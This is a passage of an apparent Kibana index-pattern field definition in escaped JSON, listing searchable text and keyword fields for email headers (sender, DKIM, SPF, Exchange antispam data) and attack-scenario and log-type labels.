ble\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"attackscenario\"}}},{\"name\":\"authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"authentication-results-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"authentication-results-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"authentication-results-original\"}}},{\"name\":\"authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"authentication-results\"}}},{\"name\":\"content-language\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-language.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-language\"}}},{\"name\":\"content-transfer-encoding\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-transfer-encoding.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-transfer-encoding\"}}},{\"name\":\"content-type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-type\"}}},{\"name\":\"date\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"date.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"date\"}}},{\"name\":\"dkim-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"dkim-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"dkim-signature\"}}},{\"name\":\"emailfolder\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"emailfolder.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"emailfolder\"}}},{\"name\":\"feedback-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"feedback-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"feedback-id\"}}},{\"name\":\"from\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"from.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"from\"}}},{\"name\":\"in-reply-to\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"in-reply-to.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"in-reply-to\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"infra.log_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"infralogtype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infralogtype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infralogtype\"}}},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message-id\"}}},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"mime-version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"mime-version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"mime-version\"}}},{\"name\":\"received\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"received-spf\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"received-spf.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"received-spf\"}}},{\"name\":\"received.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"received\"}}},{\"name\":\"references\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"references.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"references\"}}},{\"name\":\"return-path\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"return-path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"return-path\"}}},{\"name\":\"subject\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"subject.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"subject\"}}},{\"name\":\"thread-index\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"thread-index.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"thread-index\"}}},{\"name\":\"thread-topic\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"thread-topic.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"thread-topic\"}}},{\"name\":\"to\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"to.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"to\"}}},{\"name\":\"x-account-notification-type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-account-notification-type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-account-notification-type\"}}},{\"name\":\"x-eopattributedmessage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-eopattributedmessage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-eopattributedmessage\"}}},{\"name\":\"x-eoptenantattributedmessage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-eoptenantattributedmessage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-eoptenantattributedmessage\"}}},{\"name\":\"x-forefront-antispam-report-untrusted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-forefront-antispam-report-untrusted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-forefront-antispam-report-untrusted\"}}},{\"name\":\"x-gm-message-state\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-gm-message-state.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-gm-message-state\"}}},{\"name\":\"x-google-dkim-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-google-dkim-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-google-dkim-signature\"}}},{\"name\":\"x-google-smtp-source\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-google-smtp-source.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-google-smtp-source\"}}},{\"name\":\"x-incomingheadercount\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-incomingheadercount.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-incomingheadercount\"}}},{\"name\":\"x-incomingtopheadermarker\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-incomingtopheadermarker.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-incomingtopheadermarker\"}}},{\"name\":\"x-message-delivery\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-message-delivery.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-message-delivery\"}}},{\"name\":\"x-message-info\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-message-info.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-message-info\"}}},{\"name\":\"x-microsoft-antispam\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-mailbox-delivery\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-mailbox-delivery.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-mailbox-delivery\"}}},{\"name\":\"x-microsoft-antispam-message-info\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-message-info-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-message-info-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-message-info-original\"}}},{\"name\":\"x-microsoft-antispam-message-info.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-message-info\"}}},{\"name\":\"x-microsoft-antispam-prvs\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-prvs.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-prvs\"}}},{\"name\":\"x-microsoft-antispam-untrusted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-untrusted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-untrusted\"}}},{\"name\":\"x-microsoft-antispam.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam\"}}},{\"name\":\"x-ms-exchange-antispam-messagedata\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-antispam-messagedata-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-antispam-messagedata-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-antispam-messagedata-original\"}}},{\"name\":\"x-ms-exchange-antispam-messagedata.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-antispam-messagedata\"}}},{\"name\":\"x-ms-exchange-authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-authentication-results\"}}},{\"name\":\"x-ms-exchange-crosstenant-authas\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-authas.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-authas\"}}},{\"name\":\"x-ms-exchange-crosstenant-authsource\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-authsource.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-authsource\"}}},{\"name\":\"x-ms-exchange-crosstenant-fromentityheader\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-fromentityheader.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-fromentityheader\"}}},{\"name\":\"x-ms-exchange-crosstenant-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-id\"}}},{\"name\":\"x-ms-exchange-crosstenant-network-message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-network-message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-network-message-id\"}}},{\"name\":\"x-ms-exchange-crosstenant-originalarrivaltime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-originalarrivaltime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-originalarrivaltime\"}}},{\"name\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip\"}}},{\"name\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg\"}}},{\"name\":\"x-ms-exchange-eopdirect\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-eopdirect.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-eopdirect\"}}},{\"name\":\"x-ms-exchange-minimumurldomainage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-minimumurldomainage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-minimumurldomainage\"}}},{\"name\":\"x-ms-exchange-organization-authas\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-authas.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-authas\"}}},{\"name\":\"x-ms-exchange-organization-authsource\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-authsource.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-authsource\"}}},{\"name\":\"x-ms-exchange-organization-expirationinterval\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationinterval.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationinterval\"}}},{\"name\":\"x-ms-exchange-organization-expirationintervalreason\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationintervalreason.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationintervalreason\"}}},{\"name\":\"x-ms-exchange-organization-expirationstarttime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationstarttime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationstarttime\"}}},{\"name\":\"x-ms-exchange-organization-expirationstarttimereason\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationstarttimereason.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationstarttimereason\"}}},{\"name\":\"x-ms-exchange-organization-messagedirectionality\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-messagedirectionality.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-messagedirectionality\"}}},{\"name\":\"x-ms-exchange-organization-network-message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-network-message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-network-message-id\"}}},{\"name\":\"x-ms-exchange-organization-pcl\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-pcl.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-pcl\"}}},{\"name\":\"x-ms-exchange-organization-recordreviewcfmtype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-recordreviewcfmtype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\